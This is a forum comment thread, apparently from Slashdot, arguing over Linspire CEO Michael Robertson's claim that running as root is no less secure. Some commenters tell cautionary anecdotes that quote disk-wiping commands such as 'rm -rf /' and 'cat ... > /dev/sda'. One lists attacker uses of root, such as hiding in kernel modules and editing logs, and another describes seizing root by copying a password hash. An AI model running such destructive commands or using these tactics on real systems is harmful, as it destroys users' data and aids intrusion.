This message brought to you by the Society For Capability-Based Security (SFCBS).
Is equally hilarious.
But I've been running my Windows box with the Admin account forever. Never have I had any trouble with haxors or viruses. I would say this is due to the firewall and AV software I have running. Now, could I run an account with less privileges and not worry about AV or firewall? Maybe, but I'd be thowing out a lot of convenience of being able to change settings and install software without putting in a password.
Plus, I think some people are missing his point. OS's can be restalled. HD's can be reformatted. Files can be replaced. But once important personal data is in the wrong hands, there is not getting it back. He's saying that a system crash for most users is not as critical as having important data stolen. So as far as securing data, (for as single user) running as root is no more secure than running a limited account.
Don't take life so seriously. No one makes it out alive.
I'll run as root on my machine, but I think I'd better set up a seperate, non-privliged account, for Mr Robertson. I don't think he's quite ready for / power.
Jon Green Cheyenne
Ever been root on one keyboard, and email (or Instant Message) on another?
Sometimes it's easy to start typing a message on the wrong keyboard, and into the root shell. Usually they won't be valid commands, but we all know Murphy's Law.
Many of us are the de-facto support for Windows users, usually friends and relatives. Do you know how incredibly easy it is to have a Windows system infected? You pretty much have to turn the computer on and that'll do 'er. Do you know why this is? It isn't the crappy kernel anymore -- they went over to an NT style one in XP. The reason it's trivial to infect a windows system is that the home users run with the administrative account all the time. That's also why real IT companies are somewhat harder to infect than home users -- they won't typically even give their users the admin account/password and security policies usually make it a firable offense to run as the administrative user full time (Basically you can do it until your system gets pwned and fucks the company network, then you're out.)
And while I typically expect upper management to be clueless, the CEO IS the spokeperson for their company and when a Linux Company tells me it's OK to run as root, I am typically discouraged from doing business with them because my impression of them is that they're a bunch of IDIOTS!
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
127.0.0.1.
Just don't tell anyone that it was me who told you.
“Wait for Hurd if you want something real” –Linus
So they'd type that?
It happens. I once accidentaly typed an extra space when deleting core files on a production system:
Goodbye to a full day of work.. Of course, now that I am more experienced with *nix systems, I see that there were several issues with the system configuration:Before you blow everything out of proportion, take a second to look at a few things from a different perspective:
1) The end user of Linspire is most probably a windows user trying to switch to something cheaper. The odds of Linspire being heavily used in a multiuser environment are bleak at best.
2) He makes a valid point, the most valuble information on your computer are things stored in your home directory. Credit card information, social security, emails, etc. Guess what . . . `rm -rf` will eliminate all of that even if you aren't root. Who cares if you accidentally wipe an X library, a reinstall will fix that, it won't get back your emails and resumes.
3) Everyone's argument for the flaw of running as root seem to stem from services running as root, which is something the enduser of an operating system like Linspire shouldn't be expected to fix anyway, nor will most Linspire users be running apache servers and mysql servers, I'm just guessing at that.
A windows user or a linux newbie doesn't want to remember several account passwords just to change the IP address of their computer, or to reboot, or mount an external hard drive, or start Samba, etc. They want to know that they have permission to do those things out of the box. That's how windows is set up, that's what they want. Security should be handled by turning chrooted service invocation, firewalling, etc.
This isn't FreeBSD, tailor to your customers and make them happy, without them you don't have a business.
http://www.linspire.com/lindows_michaelsminutes_ar chives.php?id=153
And when building mass consumer devices, one has to add extra junk, even though it may not be strictly neccesary. You add signs not to open things that no one should ever open. You add grills so that no one sticks a finger in places where no one should stick a finger in. You put covers on parts that really don't need covers, but need to be left alone. Making a consumer device requires a bit of extra thinking. Things are done not becuase they are required, but because they are neccesary.
So, consumers need a special mode to run safely. It is precisely the lack of such a mode that made windows crash and burn when it becam a commodity. No one needed it to start. But for some reason MS never developed the consumer OS. We have now have the chance to do so using Linux.
"She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
Here's why: What's the most important thing on your desktop? It's the data. If someone gets access to your libraries or whatever, who cares? Your data is the most precious thing on your computer. And whether you log in as root or log in as user, you have access to that data, technically anyone who's compromising your account has access to your data as well.
Actually, I'd think this would be an argument for more user seperation, rather than as a somewhat reasonable point. Under his paradigm, it would be better to seperate some tasks by (non-super) user, such as browsing for porn, online bill paying and educational games for your child. Clearly, the data, risks and reasonable problem vectors are different for these 3 activities and a quick out and login is not that much to ask for a little extra peice of mind.
While this is true, he neglects to mention one very important thing: you don't have to pass a test in order to mess around with your computer. Unless someone standardizes a competancy test for computers which loads on first login for each user, there ought to be some level of protection for all the users on that machine (or any other machine connected to the internet) to prevent the "unlicensed driver" from causing harm.
The user can accidently run things that (s/)he may be ignorant of, and unfortunatly have unforseen side effects.
This brings up a very good point about people who are new to computers. Most of the people that I've seen who have difficulty learning how to use a computer fear them. Actually, not the computer per se, but rather they fear that they are going to break it. If they try doing something they don't fully understand, they are afraid they will cause irreperable harm to the computer.
Strong priveledge seperation makes this a non-issue. As a regular user on linux, I would have a seriously difficult time causing serious harm to the box through anything I might do. I might screw up my data, or the appearance of things, but in the end, I cannot break the OS.
Under Windows, I can do all kinds of bad things. I've heard countless stories of people who are smart about how they use their computer coming home to find that it's useless becuase their kid downloaded a worm. It's one thing when the kid breaks their account, it's another when the whole operating system has to be re-installed from scratch.
This sig has been temporarily disconnected or is no longer in service
OS X has it right in this regard. Even the administrator runs as a normal user for most of the time. If they want to install something such as an update, they must use sudo to do it. At the very least that means that trojans have an extra hoop to jump through.
On Windows (or Linspire) if the vast majority of users are running with root it presents a much more attactive attack surface. Aside from that, it prevents users from themselves - e.g. stopping some dumb user from cleaning up their machine like deleting etc/ for example.
Michael Robertson should know this. In fact I suspect he does know this and employs this kind of rhetoric because Linspire has traditionally thrown all the security switches to make it one of the least secure Unices ever. At least it offers you the choice of a logon and password which is a start. Really though Linspire should adopt the Mac model. The fact that OS X makes it virtually transparent means that it's not a massive burden on the user to figure out.
Even from a business perspective, less destroyed machines and less exploits is obviously good sense. But who knows - perhaps Linspire loves support calls for the revenue they generate.
If we all login as root then everyone could see my hidden pr0n dir!!!
i have run os x and one of the ppc linux distros as root and and i find that doing so just messes stuff up. i can only say that it just never works right. i wish i had some specific instances, but i only know i don't do it regularly for a reason (or many reasons, as i've had the root gnomes bite me once too many times). thanks, but i'll be computing as admin, mr. linspire guy.
clackerd (forgot my login at work)
temporary signature
The reason that Robertson didn't get the answer to why not to "run as root" is twofold.
1.) He didn't want to hear the answer when it was told him.
2.) probably 99% of people who know that you shouldn't "run as root" don't know absolutly why themselves. They have a pretty good idea, but someone they respect and trust (and who is correct) told them it was stupid.
The other 1% who could have told him why, weren't consulted. Nor will they be.
It's no accident that Linspire (Lindows) is modeled after Windows, and it contains Windows' greatest fundamental security flaw.
Mikey, what is a bot? And how are they born?
For most of my work, I log in as Fred.
For anything on the net, I log in as Bill.
Almost none of my data requires web access to process. Anything I download as Bill is readable by Fred.
This seems pretty bullet proof to me. Am I kidding myself?
almost Word for word, this guy has been posting this same text around different sites for 2 years. It has sort of reached goatse status (ie effing annoying). Just ignore it
It says it all and you're a fool to ignore what Unix started out as and what dangerous idiocy is still contained within its frightening depths. Like a nuclear reactor, it has its uses but should always be treated with great respect. If you're relying on the reactor to produce needed power and not contaminate the countryside, then leaving the control room wide open to any child that walks in is like leaving the average person in root on any given *nix box that is being relied on. Either thing is stupid and asking for trouble.
It's not for nothing I half-rejoice at the option of using Run As on XP Pro but still await the concept of the machine not running every freaking thing as root. Until then, Windows will still be massively vulnerable as will every *nix box administered by someone following this guy for advice. Thankfully, the OpenBSD adherent where I work would laugh themselves into an asthmatic attack if they read his statement.
If my grammar and spelling are off, I am [distracted/tired/careless] (take your pick)
As a professional hacker, I'll give you the 25 cent reasons.
1) Only root can forge packets. I have to get root to steal IP addresses and adjust routing tables most of the time.
2) Only root can install kernel modules. Kernel modules are a great way to hide from prying eyes.
3) Root can debug any process. If I can debug another process, my program can spread to that process giving me complete control of it.
4) Getting root is noisy. If actually wants that box and not just to use it as a relay of some sort, he generally will need root to take the credit card numbers, corporate bid info, etc. Local exploits are among the noisiest and are the most likely to get caught by a good syscall IDS.
5) Only root has access to most of the log files. If I'm not perfect when I take over a box, I've got to adjust the logs. I have to be root in most cases.
6) Only root has raw disk access. If I want to hide all my stuff, the best way is to directly modify the filesystem. You need raw disk access for that.
etc, etc, etc
Yes, 99% of my machine will not be affected. But guess what? I'm still losing that text document, which, to me is a hell of a lot more important than losing /bin/ls (which I can just reinstall). I think this is where Michael was heading, before he went down that road of overgeneralization. There's no safe way for me to protect that document from a malicious program.
Also, you speak about keeping important files listed under a different user-- here's the issue: you shouldn't need to do that. If I have to authenticate every time I want to save a gif from Photoshop, that doesn't make for a good user experience at all.
Lastly, you say: If I so desired, I could limit the login / password for my MySQL account to only allow row INSERTs and SELECTs, but no DELETEs or DROPs.
But you don't, right? Why not? Because you're willing to take the risk that your MySQL login won't get swiped. So where's the acceptable level of risk? Michael seems to think that Linux has good enough security to make running as root not that big of a deal.
YHBT YHL HAND
Profanity is the language all programmers know best.
http://www.securityfocus.com/columnists/144/commen t/18387#MSG
http://business.newsforge.com/comments.pl?sid=2415 9&op=&threshold=0&commentsort=0&mode=thread&tid=11 1&tid=2&tid=3&tid=31&pid=15234#15239
oops i meant ./bladir
If i wasnt root, i wouldnt have hurt a thing.. Instead, as being root i just killed my entire machine due to hitting enter by accident..
There are of course MANY other examples of why root is bad, but this is an easy example.. And with how easy it is to typo...
---- Booth was a patriot ----
on any multi-user environment, you're already running multiple users. In a single-user environment, you might as well run as root. Anyone (you, or something pretending to be you) can make a file called "ls" in /tmp. If this you is a user-account, it can completely trash everything you care about. If this you is actually root, it can not only trash everything you care about, but also trash a bunch of things you care nothing about! And it can even open a back door in two fewer lines of C than if it didnt have root, using methods which people who attack desktop systems dont care about too much anymore because it's not as efficient to control!
-- 'The' Lord and Master Bitman On High, Master Of All
"Honey, what's this journal entry about Las Vegas?" :-)
This seems to be drifting off topic, but while we're talking about ways to avoid the catastrophe of rm -rf / just consider replacing rm altogether.
./this ./or ./that
./this ./or ./that
I just threw together a bash script to keep an indexed "trash" directory of everything I delete. Instead of typing
$rm -rf
I just run the script
$trash
and it gets moved into "${TRASH}/`date +%Y.%m.%d_%H.%M.%S`/". I keep an index of these files and run another script:
$restore this
to undelete it. A couple more scripts let me check out the size/contents of the trash directory, empty the trash, etc.
It's been a few years since I instituted this command-line recycle bin, and I have never accidentally deleted anything since. I also have a really hard time believing I'm the only one who does this.
Not that I post on slashdot or anything.
rm -Rf / as nonroot will make you give a sigh of relief.
That sounds like a workaround to make up for a design flaw in the command-line interface to me.
No, it illustrates that some portions of the computers storage space have need to be protected. And that sometimes users do need to alter them, but not generally.
It's just as easy to take a big chunk of the Windows directory and start trashing stuff with the GUI as well. If you give users the means to manipulate persistant storage (which you do need to do because as the article says, data is king) then you also have to have some way to gently steer them away from utter disaster. How you not heard tales of users trying to free up space on an HD deleting some crucial part of Windows? I have!
"There is more worth loving than we have strength to love." - Brian Jay Stanley
The reason why he's able to even phrase some sort of odd point about root is that he hasn't *got* Unix yet. Given 65k possible UIDs on his private box, he chooses to use only one for his "non-root" usage, and then claim that all his personal eggs are in one basket.
Doh! Of course they are, if you put them all in a single basket then they're all at risk of being broken together.
But if that were how Unix were meant to be run then we'd only need two UIDs, one for "root" and one for "user". Well fortunately Unix presuposes that we're less dumb than that.
If he got off his ass and put different datasets under different users and shared the lot through read-only permissions and separate write spaces, then he wouldn't be making such silly comments about root not being more risky.
Jeez.
"The question of whether machines can think is no more interesting than [] whether submarines can swim" - Dijkstra
I tend to agree with Robertson in this case.
See, the problem is that if malicious hacker can convince a user to execute a program as a normal user, he/she might also be able to convince a person to su to root and execute/install the program. Root isn't the be all/end all of solutions that many unix users claim. Neither are antivirus apps. The engineering of the hack isn't usually a technical one. It's a social one.
Believe me, I wish this wasn't the case. One day, I will experience bad judgement and be susceptible. For the MS bashers out there, Windows 2K and XP has admin privileges... has it helped?
I don't know why people even use linspire.
First of all, it offers NO choices for users.
(eg. KDE and nothing else)
Their dumb little Click `N Run or whatever "technology" isn't even fricking technology, its the results of some 14 year olds who think they know how to "m4x0r t3h l33t c0d3". And they make you pay like a dollar to download an OPEN SOURCE program. And the money they make off that? It doesn't go to the developers for the open source application. IT GOES RIGHT BACK TO LINSPIRE. There is NO credit where credit is due.
( @ 14 year olds : learn C; Its more fun )
Another thing, their using a version of KDE thats a fricking year old! ( last time I checked )
And they somehow manage to f*ck the Keramic theme up in a terrible terrible way that simple wasn't deserved.
And now this moron is griping about other people griping about his idea to let users just be root?!
For f*cks sake! Thats just assinine! Thats like sitting down and saying.. Hmm.. Wouldn't it be fun if I hit the wrong button and deleted all my most important files while playing with this pretty box with letters and numbers inside it that says BASH.
I dunno... They may have improved since last time I used Linspire ( back when it was called lindows ( oh shit I'm gonna get sued )) but, it would need to improve A LOT.
The one time when I used Linspire, I removed it and installed SuSE over it. ( I use Fedora Core now )..
If con is the opposite of pro. Then isn't congress the opposite of progress?
that's like running windows ...
--- Sigmentation Fault - Comments Dumped
Any exploitable program you run as another user will still need a local escilation exploit in order to do anything harmful.
That's fine, but he has a point. How much actual real-world good does that do? It does plenty of theoretical good, but so does making the speed limit 10 MPH. By far the better solution is to make sure that the system is safe from remote attacks.
By far the better solution for safe sex is to get rid of all STD's.
Seriously. Answer me this -- do you administer servers?
I run *all* my daemons in chroot jails as non-root users. Why? If someone hacks in through an exploit in Apache, they have compromised a small subset of my system. I notice and react quickly, and they don't actually do any damage. But if I run as root, and someone compromises Apache, my system is not under my control anymore. At least, without a lot of hard work.
Any program run as root/suid root can cause a hole, no matter how small or trivial the program is.
So, As Seen On TV, you now have a new project.
Verify that the code used in a Linux distro on the desktop is secure from all vulnerabilities. I would start with the kernel, then move to the X server and the window manager, and then the applications.
See you in thirty years!
"...Jimmy destroyed all my files for my book report! and it's due tomorrow!"
Since a decent majority of open source developers actually give, to use your phrase, a flying fuck about standards, it's generally not in their best interests to promote use of something that isn't a standard, will never be a standard and would be completely undesirable as a standard. Additionally, if it can't be ported across architectures then including it would do a hell of a lot of damage to firefox's geek cred, and hence developer base.
Having said that, I think a plugin that allowed you to use activeX is a cool idea. I just don't think that tying the browser down to any one platform is a great idea. If you're particularly keen to produce an ActiveX version, go fork the codebase.
For the love of God, please learn to spell "ridiculous"!!!
Microsoft can and does get away with being that arrogant. In the face of callous indifference to whether their software works and the number of heart attacks that problems with it cause, one might as well be arrogant back.
This isn't the middle east peace process. Making a concession to Microsoft by including their vulnerable ActiveX tech does not mean they will make some concession by fixing X number of bugs in return. Once you have ActiveX in Firefox, Firefox isn't safe anymore and you might as well run IE.
Linspire has a nice building, I used to walk past it every day. Bad traffic though in the afternoon.
What keeps me going is my inertia.
Even on a single-user system, there is a damn good reason to run non-root: otherwise, if an attack makes its way in, you'll have no way to know about it. That's because every utility you could use to verify the integrity of the binaries and libraries and kernel you use can be altered by root.
Not everyone takes proper advantage of the root privelege separation. Popping up dialog boxes asking you to enter your root password, for example, was a terrible design decision on the part of most distros. And sudo is almost always misused. But properly done, root privsep is your only way you can reasonably know you're running a clean system.
I hope I can remember the details of this correctly. Here goes. Some time ago (maybe 5 years ago) I was running linux on a ppc box. I wanted to play a .au file. The sound device was something like /dev/scd All I needed to do was /dev/scd
/dev/sda
cat soundfile.au >
I typed
cat soundfile.au >
Whoops. Yes, there is a reason not to run as root. I admit the mistake was dumb but if I wasn't root I would have been protected from myself.
I haven't seen a rebuttal that gives a good solution yet. Michael Robertson is right about data being the most important, but seems to think that having users run as non-root means that changing the date will require a password (which is a "no no" for ease of use).
This problem can easily be solved by making all non-critical configuration tasks (e.g. setting the date) run using sudo behind the scenes. Changing the date as a non-root user shouldn't require a root password (unless you're real paranoid about bugs in your date setting code allowing crackers to exploit date-triggered viruses, or something...)
As for requiring a password, the only real solution is biometric, and that will be a while in coming. But most grannies aren't going to be changing hardware settings unless they are comfortable entering passwords. And if they aren't, they shouldn't be changing hardware settings anyway...
Life's a lot like money-- you spend it, then it's gone. Spend wisely.
I used to work on a p2p video conferencing system. These types of software are rarely, if at all, bundled with standard distributions. Further, most video conferencing software requires root access for installation, some even require that you're root in order to execute them. I'll be the first to admit that I've installed hardware drivers without knowing the source of all of the parties who developed it. At best, I'll have a certain degree of trust with the hardware vendor who distributes it, but who knows if even they know the true source of the code.
I'm curious though: it takes a fair amount of time to actually wipe out say, 10gb of data. So I wonder if you rm -rf / and then immediately hit ctrl-c just how much you lose (or if you even really lose anything since rm probably just removes the file entry, as opposed to overwriting the data with zeros or noise...)
The root account is disabled automatically.
You read that right. You want to do something that requires root access?
sudo.
Anything that requires root prompts you with a dialog box, explaining in mostly clear language.
Running as root is like running with scissors.
I used to always work under root, until one night. I was extremely tired and no longer really knew what I was doing. I only remeber typing in "rm *" to remove all the content from the directory, however I was not in the folder I wanted to delete the files from, but in "/". Ofcource, except for a few files none of the important system data & folders were removed - i didnt type "rm -rf *". :)
It was an extremely careless and stupid mistake, however I realized that it would be safer to just create a user account and "su" when I need to - so when I'm in another one of those funky moods I will be harmless because I'll never get my funky 19 char root password right
here is MY solution to this.
/
/home
/home/username.diff.img
/home/username.diff.img /
/etc/difffilesystem.exemptions when logged in as root and adding a line
/etc/difffilesystem.exemptions -wrx
/home/* -wrx
/home/$USER.diff.img +wrx /home and then allow access to that users home only.
/path/to/file/or/folder/* =unixfilepermissions
/* =unixfilepermissions
/etc/difffilesystem.exemptions -wrx
/home/$USER.diff.img +wrx
/home/* -wrx /etc/difffilesystem.exemptions -wrx
/home/$USER.diff.img +wrx
we need a stack file system. where the base file system is / and the stacked file systems are difference files for each user.
for instance.
notice no folders in home, just difference files.
login
mount -o diff_filesystem
this mounts a filesystem right on top of the old file system. and gives full read/write access to the / BUT all changes are saved to the diff.img rather than the / filesystem. this would allow unpriviledged users to install programs(if allowed to by making rpm/apt-get/emerge/etc etc suid root or something) and alter many many settings BUT not be able to mess up the base system OR other users.
i know that this is a generic and incomplete solution as no user should have access to another users files BUT this could be handled in the stack filesystem module forbidding access to other home directories or root definable files and folders.
so root could modify
would make it so the average user could not wrx that file or
would deny access to
i do this because unix file permissions would not be valid because any changes to the files would be written in the difference file so no changes would be made. of course the exemptions file should have an option
or something like that to use the base filesystems permissions for those files.
so the AVERAGE user would have an exemptions file like
#base config
#other options.
while a more priviledged user would get
##commented out for priviledged user
#/* =unixfilepermissions
so, the exemptions file would allow some users to install software via traditional install programs like apt-get or rpm without the need to modify those programs OR run as root.
it would allow you to limit the folders users could modify so they could not re-run daemons with different settings in their userspace after editing the configs.
and it would allow a side effect of makeing the users home directory a single file with its own filesystem. the / could be ext3 but the users home folder and all modifications could be reiserfs.
AND the root filesystem would always be intact.
just some thoughts.
thanks for your time
Is he the guy who started with MP3.com? what does he know about Unix (and Linux) administration? He sounds like not too much.
cause if its safe he should post his login and pass here.
The _real_ operating systems out there (read UNIX) has teached us that permissions are one of the more important stuff in systems security. Unix takes this concept to a new point with the "everything is a file" aproach, so using a single set of permissions (file system permissions) you can limit a user to only see certain files, only use certain programs, or only use certain printers, only connect devices into a certain port, etc. ...
Even windorze and apple understood that this was needed, and they implemented it (In the case of m$, implemented poorly, in the case of Apple, Stolen).
And now this guy (Who has proven to be a bloodsuc ker trying to be the new bill gates using the efforts of the Free Software comunity, and not giving back a shit to it (since every piece of crap they make is propietary), they also have got a record on spyware and other shit) Trys to tell us that we were wrong, and that we should just drop permissions all along?, Come on
WTF am I doing replying to an AC at 5 A.M on a Friday night?
So all these years later, and NONE of the shells do a trap for rm -Rf /, even the rm command should prevent that or at least ask an interactive question.
I dont think the guy said, make every service run as root, I think he meant running your X/apps as root.
But I like the OSX model of asking for the root password, though once I lost it and I actually used a normal user account to 'reset' the root password to what I wanted to - All I did was copy the crypted string of USERX into the string for ROOT in some System Admin Config util there and bingo I got root access easily....
Liberty freedom are no1, not dicks in suits.
"I defy anybody to tell me why is it more secure to not run as root. Nobody really has a good answer. They say 'oh, yeah, it is!', but it really isn't."
If you run bad stuff it can't fuck up your stack.
(Hey! I did it!)
OS = Windows XP
Administrator = All_Local_Users
If History = Multiple_Viral_WebPages Then
My_Day = Very_Bad
End If
End.
I dare you to mod this redundant mod +0/-1
This was brought to you buy the Department of Redundancy Department
This is hearsay, but I believe there were some root exploits in some "older" versions of IRC. There was a time when remote users could easily transfer files to your system byway of IRC. Who knows what happened after the software was downloaded, but suffice it to say that software in pre-development usually don't come with polished security.
There have been some very good research projects done on how to build a more secure system, and some of the most amazingly effective ones have been the ones that challenge the basic assumptions of "best practice".
MIT Kerberos takes the view that no machine on the network can be implicitly trusted; access to network services is controlled by tickets, mediated by a ticket distribution service with which each user and service has a pre-shared key. This works even for systems in which the local operating systems have no internal access control mechanisms whatsoever.
Capability-based systems essentially throw out the classic security model of users, roles and permissions, replacing them with a system of nonforgeable references by means of a combination of memory protection and cryptographically strong naming.
Finally, people need to come to terms with the fundamental fact that content-based security schemes are a losing proposition (1, 2). Virus scanners, adware scanners, porn blockers, spam filters, and even national customs departments all face the same problem: they can only inspect what goes by and apply a list of tests to winnow bad items. There is strong economic pressure to find ways to bypass these types of checkpoints, so new tricks are constantly being invented, only to be compensated for by the guardians; thus the guardians are always a step behind.
...when you're writing a game...tweak the difficulty of "Easy" to something [your mother] can cope with. -- onion2k
...forgive my ignorance, but what about running Yast Online Update, or apt-get, where you have to be root,but running as a normal user?
Hmmmmm....
the main point is eventually we will have to trust ourselves as root; whether we're running SELinux or CAS (Code Access Security). security must be managed, not just locked away.
An elevator has only six possible states: going up, going down, or stopped, multiplied by doors open or doors closed. While getting into those states may have required skill in old elevators, the complexity was inherently limited.
Your computer has a whole bunch more potential states of configuration and execution. Just assuming ten programs that may or may not be running at a given time, right there you've got 1,024 states. Then there's the state of each of those programs - say each program is not just running or not, but can be in one of five states (which is not unreasonable - not running, loading, reading, writing, and closing). Now you've got 5^10=9,765,625 possible states for your system to be in. Six orders of magnitude more complex than the elevator. Then assume a few variables of configuration - just ten binary values would take us up to ten billion states. (And that's assuming only ten programs - right now ps -ax | wc says I've got over 100 processes running.)
It gets worse if you take a finer-grained view of what a state is - the RAM in your system can assume more states than the number of elementary particles in the Universe.
Of coruse in theory, our operating system partitions that complexity, so you only have to deal with the states of one program at a time. And one way it does that it by separating user privileges.
Tom Swiss | the infamous tms | my blog
You cannot wash away blood with blood
Windows 98 has no concept of root.
Win98SE without IE and Netbios over tcp/ip is pretty secure. Neither the Wife's or kids machines have ever been compromised. Granted, we run ZoneAlarm on both machines and I don't allow the kids to download/install programs without permission (active network monitoring is in place).
Still, I wouldn't recommend any user to run an internet connected computer as root. If I were a malicious person I could craft an XPI to own a linux box. It'd be just a matter of waiting for some clueless Luser to click on 'OK'.
Personal gripe. The mozilla foundation needs to sign certified/sponsored XPI's. If the XPI is not signed, the installer dialog box should be RED and consume 75% of the screen. They could also turn this into a revenue stream if they certify plugins for a small license fee to third parties. My opinion and I digress.
Enjoy,
It's just the normal noises in here.
If you are running in a multiuser environment with possibly untrustworthy or inexperienced users then yep, not having them all have root privileges is a hell of a lot saver. It protects the users privacy, avoids other people deleting each others data be it by intendion or accident or whatever.
In a home environment with just one user, who also happens to maintain the machine its however a whole differnt thing. All valuable data there is stored in $HOME anyway, so gaining root helps nothing to destroy valuable data, neither helps it with preventing spying of credit card info and such. Last not least switching from the user who maintains the machine to root is also rather trivial for some evil programm, either wait till 'sudo' is unlocked or install a trojan 'su' binary in the path or just listen to the X11 key events, sooner or later everybody will end up typing his password in on a self maintained machine. There are still a few things left like accidently 'dd'ing the harddisk with zeros or such, which are more or less prevented by not running at root, but then if you are dd'ing around you are probally running at root anyway. It might also help in making it impossible to accidently delete other partions like the window one. But there is really not much for which not running as root protects you on a single-user machine, the benefit is far more in that it clearly seperates the users data and the application data, so that programms don't end up storing user data in 'C:/Program Files/SomeApp/' like many do under windows, but in that they are forced to store in $HOME.
So should one run as non-root? Yep, last not least because a bunch of programms simply refuse to run as root, which would be quite annoying. But one shouldn't really have any illusions that one gains any kind of real advance in security in a single-user environment.
Basically, his point is that users care about their data and running as root vs not offers no such protection. Michael's solution is to throw up his hands and give up such security completely. Why not, instead, embrace the root model to protect user data just as your system critical libraries are protected?
The ability to do so is already in the system: just create a different user. But I don't want to run Openoffice, etc al, as a different user.
In large coding projects, CVS/SVN/etc are used to maintain version integrity. Here's a thought: integrate svn or cvs into the GUI. When a user is asked to save a file, it prompts them for a password, they enter and voila (modify the APIs for Xwindows et al so that individual apps don't even need to know). Security. Additionally, since you're using version management, it's now possible to revert to previous version of documents -- hard drive space is so cheap nowadays compared ot file sizes (50KB for a spreadsheet) why not combine both technologies? The key is merely integrating the technologies into the GUI. Not that this is easy, but I see no reason why it's not useful (I have dozens of different versions of most everything lying around, just in case).
Essentially the entire comment thread has been Robertson bashing which is good -- since his conclusion is ultimately wrong -- but no one seems to want to offer up a solution to the one good point he makes.
-- Political fascism requires a Fuhrer.
...that is the question. As somebody who's actually deployed many Linux systems for Joe Sixpack, I can say with a great deal of honesty that when you tell them that they can't break the system as long as they're not in root, they damn well don't log into root unless it's for something important. Most users are afraid of breaking their systems anyway, so if they see a clear cut divide between what's safe and what isn't, most will willingly choose to err on the side of safety. As a result, I've never seen any of those boxes compromised in any way.
Call me a troll, but I think that if Linspire wants to try and be a "better Windows", they're going to find that you can't beat the original, no matter how crappy it may be. On the other hand, if they strive to be a "more consumer palletable Linux", they should probably consider actually addressing Linux's weak points rather than ignoring its strong ones (like security).
-AT
Working in a DevOps shop is like playing in a band made up entirely of keytarists.
I know it's not secure to log in as root, but many users are driven to do this because of how restrictive Linux security is.
I mean you need to type the root password just to connect your modem, or change the clock time. Is this really necessary on a single user desktop?
You can either be secure by design and implementation.. (OpenBSD), or you can be secure by piling up difficulties in the way... (Windows XP SP2 + Norton Antivirus etc).
Not using root is in the second category. Even OpenBSD has all services disabled by default and many Linux distros are enabling iptables to close most ports by default, both of which fall in the second security category. Ideally, the first category would be enough. In real life, you need both the good design and implementation, and the second security layers because nothing can be 100% secure. Even if it was 100% secure, the human error always exists, which is undenyable.
So in theory root is secure, as long as you're perfect, your passwords are extremely difficult, and your OS something like OpenBSD, or like OpenVMS for the VAX, which very few hackers would even want to learn to hack. But in real life, stay away from root.
"Give orange me give eat orange me eat orange give me eat orange give me you." -Nim Chimpsky
My reaction? It's about time! This will help far more than any "Trusted Computing" initiative will.
Now before I continue, I'll comment that my workstation/gamestation is a Windows XP SP2 machine. My web services machine is a Debian Linux machine.
I have two accounts on my XP machine: One Administrator and one Limited User. I use the Limited User Account on a day to day basis for my classwork, Applications, and Games. I use the Administrator account to install new programs and program updates.
The biggest problem with a LUA policy on a Windows system is... Application manufacturers. Programs tend to be written with the impression that the program directory and HKEY_LOCAL_MACHINE part of the registry is always writable. Unfortunately, this is undoubtably because Windows 9x didn't have the concept of file or registry permissions.
On XP, by default, Limited Users can only write to their Profile directory on C:, and can only write to the HKEY_CURRENT_USER part of the registry. These are where user specific files and settings belong! The %USERPROFILE% and %APPDATA% environment variables are even set up for them! There's even an %OS% environment variable that tells the installer that this is a Windows NT system (It's set to Windows_NT).
The most recent offender for ignoring these restrictions, that I've installed, is World of Warcraft. Since it was written in 2004, its installer is aware of accounts and account types, and gave me an error that I needed to install it as an Administrator. That's all well and good, but it still tries to write files to %ProgramFiles%\World of Warcraft\WTF\Account\[USERNAME]\ heirarchy every time it runs. While the game seems to work even if it can't write its files, you also can't save any settings changes.
GLaDOS for President 2016! "Well here we are again. It's always such a pleasure." -- GLaDOS, 2011
What kind of knucklehead would let his CEO have root?
Honestly, the boot process should be an admin account anyway, and can hand it off to another user process. Most home computers can be considered physically secure, and so merely booting (or clicking on your icon) should be enough to get to your account. Windows actually does this right.
As for how to handle admin type functions under a GUI without incessant PW prompting: give the GUI escalation privileges, but not programmatically. I.E., I click on a Disk Format icon, it runs as admin, but there be no exposed API to do be exploited automatically. The boot process could hand off limited admin privilege to the GUI, but this requires trusting your software. I guess this is too difficult for people to grok...
just how in the hell am I supposed to be able to add/remove/manage/defrag/update/etc if I'm not admin. I've tried it, on machines at school, the simplest things require admin rights. updating a freaking flash plugin you must be admin.
I'd be logging off and on every day if I weren't a user in the admin group on my home windoze pc.
I don't think it's realistic to be non-admin on windows, and I wonder how y'all do it on *nix.
In addition to the 1000's of reasons above, imagine how boldy Michael would defend this insecurity ideology if he walked away from his box and his 8 year old child decided to play around on the computer. The computer with all his financial assets, personal e-mail, business contacts, music, etc. I don't trust anyone with my data, and I'll be damned if I am going to give my kid a leg up in kicking me down.
However, your applications are also important.
Run as a user - you can only lose your data.
Run as root - you can lose your data *AND* your programs.
Programs can be reinstalled, sure. So can data, by this amazing technology called *backups*.
Plus, if you run as root, there's the potential that every other user on the machine has *their* data compromised as well, through your own incompetence/mistake/spyware, etc.
There's also the possibility that, when run as root, changes may be made to your system that you will not notice. Random example - lets say I build a trojan to modify your C library to install a backdoor into any code you *or any user on your system* link against it?
How about I modify your e-mail client's binary to silently attach copies of personal documents to any email it sends out?
You may not notice, until its too late. There's FAR more damage that can be done with root access than not - and its not *just* about restoring from backup.
smash.
I run: Windows, OS X, Linux, FreeBSD. Just because you have a hammer, doesn't mean everything is a nail.
Making the root user the default is fine, because absolutely none of the things you mention matter unless there's also user backup by default, or user management by default. (Hint: for desktop apps, there isn't.)
/usr.
I don't run as root because I don't want to do anything to my system setup by accident. I like to try out new stuff which isn't likely to nuke my data, but would think nothing of polluting my
But I don't think for ONE SECOND that I'm actually more secure that way.
If we want Unix security to mean anything, we have to do it with software. If you were serious about your ActiveX thing, we'd be running Firefox's gecko and javascript support as user "nobody". We'd have the "secure by default" distros let us play games, but only give the games access to their own config data and savegames.
This kind of thing is only feasable with massive distro-wide support, and becomes much more feasable with Namesys' ideas on filesystem "views". But it's still not foolproof.
To summarize: Don't run as root, but don't think that makes you so much more secure/sane. It's a lot less like seat belts and a lot more like adding a bit of tissue paper on top of the seat belt, in case said belt should fail. If you crash and your belt fails, you WILL fly through the window, tissue paper or not.
Don't thank God, thank a doctor!
"What's the most important thing on your desktop? It's the data."
Right. THE data. Not just YOUR data, but EVERYONE ON THE MACHINE's data. If you do something stupid as a regular user, you're only risking your own data. If you do something dumb as root, you can wipe out your whole family's data. Won't somebody think of the children!
